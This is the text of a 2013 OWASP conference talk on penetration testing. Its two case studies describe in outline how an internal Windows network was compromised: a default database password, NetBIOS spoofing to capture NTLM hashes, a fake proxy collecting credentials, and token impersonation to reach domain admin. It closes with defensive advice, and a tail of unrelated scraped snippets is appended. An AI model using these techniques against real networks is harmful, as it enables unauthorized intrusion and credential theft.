Penetration Testing
OWASP EU TourThe OWASP Foundationhttp://www.owasp.orgBucharest 2013Penetration Testing- a way for improving our cyber securityAdrian Furtunǎ, PhD, OSCP, CEHadif2k8@gmail.comCopyright The OWASP FoundationPermission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
Agenda Who am I Why this topic Case study 1 Case study 2 Lessons learned Conclusions Q&A2
Who am I Member of the Pentest Team at KPMG Romania Doing pentests against various applications and systems: Internal networks, public networksWeb applicationsMobile applicationsWireless networksSocial engineering, etc Speaker at Hacktivity, DefCamp, Hacknet and other local securityconfs Teaching assistant at Information Security Master programs (UPB,MTA and ASE) Teaching penetration testing classesOrganizing Capture the Flag contests3
Why this topic? The need for more efficient cybersecurity Penetration testing is part of thedefense-in-depth approach Verify the effectiveness of defensemechanisms and people Find weak spots in defense layersIs my data safe?Show the real risk of a vulnerabilitySuggest corrective measuresRe-verify Penetration testing can be used for improving our cyber security4
To better clarify terms Penetration Testing a.k.a. Pentesting, Ethical Hacking, Red Teaming Method for evaluating the security of an information system or networkby simulating attacks from malicious outsiders or insiders Exploit vulnerabilities and dig much deeper Penetration Testing is: Tools find thisAuthorizedAdversary basedEthical (for defensive purposes) Penetration Testing is notVulnerability Assessment / ScanningManual tests find this5
Case Study 16
Pentesting the internal network (2011) Objective:See what an internal malicious user could do, given simple networkphysical access. Malicious user:visitor, contractor, malicious employee Targets:confidential data, client information,strategic business plans, etc Initial access:physical network port in users subnet7
Pentesting the internal network (2011) – cont.8
Pentesting the internal network (2011) – cont.1. Network mapping IP ranges Host names9
Pentesting the internal network (2011) – cont.1. Network mapping IP ranges Host names2. Service and OS discovery Windows 7 Windows 2008 Server R2 Common client ports open IIS, MsSQL, Exchange, etc10
Pentesting the internal network (2011) – cont.1. Network mapping IP ranges Host names2. Service and OS discovery Windows 7 Windows 2008 Server R2 Common client ports open IIS, MsSQL, Exchange, etc3. Vulnerability scanning Nessus: 1 high, 30 medium, 39 low MsSQL server default password for sa user11
Pentesting the internal network (2011) – cont.4. Exploitation12
Pentesting the internal network (2011) – cont.4. Exploitation Add local admin13
Pentesting the internal network (2011) – cont.4. Exploitation Add local admin5. Post-exploitation Info gathering Credentials to other systems14
Pentesting the internal network (2011) – cont.4. Exploitation Add local admin5. Post-exploitation Info gathering Credentials to other systems6. Pivoting Connect to 2nd db server Upload Meterpreter15
Pentesting the internal network (2011) – cont.4. Exploitation Add local admin5. Post-exploitation Info gathering Credentials to other systems6. Pivoting Connect to 2nd db server Upload Meterpreter7. Post-exploitation List tokens Impersonate Domain Admin token Create Domain Admin user Game Over16
Pentesting the internal network (2011) – cont. Game Overon domain controller:17
Case Study 218
Pentesting the (same) internal network (2012) Objective:See what an internal malicious user could do, given simple networkaccess. Test the findings from previous year Malicious user:visitor, contractor, malicious employee Targets:confidential data, client information,strategic business plans, etc Initial access:network port in users subnet19
Pentesting the (same) internal network (2012) – cont.1. Network mapping the same as last year2. Service and OS discovery the same as last year20
Pentesting the (same) internal network (2012) – cont.1. Network mapping the same as last year2. Service and OS discovery the same as last year3. Vulnerability scanning Nessus: 0 high,21 medium, 20 low21
Pentesting the (same) internal network (2012) – cont.1. Network mapping the same as last year2. Service and OS discovery the same as last year3. Vulnerability scanning Nessus: 0 high,21 medium, 20 lowNow what? No default/weak passwords No missing patches No exploitable config problems No sql injection 22
Pentesting the (same) internal network (2012) – cont.4. Attack the clients – method 123
Pentesting the (same) internal network (2012) – cont.4. Attack the clients – method 1 Setup a fake local NetBIOS server Respond to every request with my IP address Setup multiple local services (HTTP, SMB) Request Windows authentication on connection capture password hashes24
Pentesting the (same) internal network (2012) – cont.4. Attack the clients – method 1 – cont. Captured around NTLM 50 hashes Cracked about 25% using dictionary attackwith mangling rules in a few hours Gained network access as domain user (lowprivileges) Could access some shared files on file server Not enough25
Pentesting the (same) internal network (2012) – cont.4. Attack the clients – method 2 Man in the middle attack between victim and proxy server Setup a fake local proxy server Request Basic authentication Receive user’s credentials in clear text (base64 encoded)26
Pentesting the (same) internal network (2012) – cont.4. Attack the clients – method 2 – contThe victim sees this:What would you do?27
Pentesting the (same) internal network (2012) – cont.5. Exploitation Got local admin password (global)from a special user Could connect as admin on anyworkstation28
Pentesting the (same) internal network (2012) – cont.5. Exploitation Got local admin password (global)from a special user Could connect as admin on anyworkstation6. Pivoting Search the machines from IT subnetfor interesting credentials / tokens Found a process runningas a domain admin user29
Pentesting the (same) internal network (2012) – cont.5. Exploitation Got local admin password (global)from a special user Could connect as admin on anyworkstation6. Pivoting Search the machines from IT subnetfor interesting credentials / tokens Found a process runningas a domain admin user7. Exploitation Impersonate domain admin Add user to domain admin groupGame Over30
Lessons Learned31
Pentest comparison20112012Low hanging fruits removednoyesIT personnel vigilancelowhighNetwork prepared for pentestnoyesExisting vulnerabilitiesyesyes (lower nr)mediumhighOverall exploitation difficulty32
Consultant’s advice Make yourself periodic vulnerability assessments (e.g. Nessus scans) Prepare your network before a pentest (you should always beprepared, btw) An homogeneous network is easier to defend then anheterogeneous one Do not allow local admin rights for regular users Patch, patch, patch Educate users for security risks33
Conclusions Penetration testing can be used for improving our cyber security Do it periodically with specialized people Mandatory for new applications / systems before putting in production Vulnerability assessment is not penetration testing34
Q&A35
Thank You!Adrian Furtunǎ, PhD, OSCP, anfurtuna
Penetration Testing a.k.a. Pentesting, Ethical Hacking, Red Teaming Method for evaluating the security of an information system or network by simulating attacks from malicious outsiders or insiders Exploit vulnerabilities and dig much deeper Penetration Testing is: Authorized Adversary based Ethical (for defensive purposes)
Assessment, Penetration Testing, Vulnerability Assessment, and Which Option is Ideal to Practice? Types of Penetration Testing: Types of Pen Testing, Black Box Penetration Testing. White Box Penetration Testing, Grey Box Penetration Testing, Areas of Penetration Testing. Penetration Testing Tools, Limitations of Penetration Testing, Conclusion.
Open Web Application Security Project (OWASP) National Institute of Standards and Technology (NIST) Penetration Testing Execution Standard (PTES) What is PTES? PTES, penetration testing execution standard, as the name implies is an assessment methodology for penetration testing. It covers everything related to a penetration test.
Penetration testing also helps an organization determine how susceptible or resilient to attack it really is. The process of penetration testing involves a great deal of time and dedication to ensure a positive outcome for both the penetration tester and the organization being evaluated. Comparing penetration testing to other real-world types .
The in-place penetration test using the laser particle counter is a measurement of the penetration of the total filtration system. This test incorporates the aerosol penetration from both the HEPAfilter and leaks in the filter housing or gaskets. In separate filter penetration and leak tests, the total penetration of the filtration
Penetration Testing 12/7/2010 Penetration Testing 1 What Is a Penetration Testing? Testing the security
2020 Pen Testing Report www.coresecurity.com 11 In-House Penetration Testing Efforts Figure 10: In-house penetration testing While some businesses exclusively enlist the services of a third-party penetration testing team, it is now quite common to build an in-house team, with 42% of respondents working at organizations that have one
network-layer penetration test and application-layer penetration tests. There was a short informational supplement released in 2008 by the PCI Council on penetration testing, but its guidance was very general and still left much room for interpreting what a penetration test rea
penetration test services, and for assessors who help scope penetration tests and review final test reports. . Application-layer testing: Testing that typically includes websites, web applications, thick clients, or other applications. . The differences between penetration testing and vulnerability scanning, as required by PCI DSS, still causes
